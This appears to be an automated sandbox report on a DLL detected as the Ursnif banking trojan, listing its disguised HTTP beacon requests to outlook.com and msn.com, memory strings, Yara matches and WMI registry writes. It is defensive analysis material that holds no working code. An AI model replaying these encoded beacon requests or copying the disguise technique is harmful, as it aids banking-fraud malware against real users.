Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: AM0PR03CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COMX-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1X-FEServer: AM0PR03CA0028X-Powered-By: ASP.NETX-FEServer: AM6P195CA0091Date: Mon, 11 Oct 2021 20:51:06 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3cStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.comX-BackEndHttpStatus: 404X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: B8NWasbp8cSTveuDcqZrPA.1X-Powered-By: ASP.NETX-FEServer: AM5PR0201CA0014Date: Mon, 11 Oct 2021 20:51:07 GMTConnection: close

Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.542519805.0000000004C13000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: http://ogp.me/ns#
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: http://ogp.me/ns/fb#
Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp	String found in binary or memory: https://blogs.msn.co
Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp	String found in binary or memory: https://blogs.msn.com/
Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633985424&rver
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
Source: WerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmp	String found in binary or memory: https://watson.telemetry.microsoftv
Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp	String found in binary or memory: https://web.vortex.d
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fRSTOkJCBHcQTlX372kVU%2fXbET532Uukq3yxPfegA%2frK8jg_2
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp	String found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZ
Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmp	String found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"

Source: unknown

DNS traffic detected: queries for: msn.com

Source: global traffic	HTTP traffic detected: GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
Source: global traffic	HTTP traffic detected: GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com

Source: unknown	HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 6yDD19jMIu.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE21B4	0_2_6ECE21B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00754C40	0_2_00754C40
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075664C	0_2_0075664C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00752B76	0_2_00752B76
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075954A	0_2_0075954A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0075AF24	0_2_0075AF24
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00757DEC	0_2_00757DEC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECF5600	0_2_6ECF5600
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED2B597	0_2_6ED2B597
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED3A2B1	0_2_6ED3A2B1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED1E8C0	0_2_6ED1E8C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_012BAF24	3_2_012BAF24
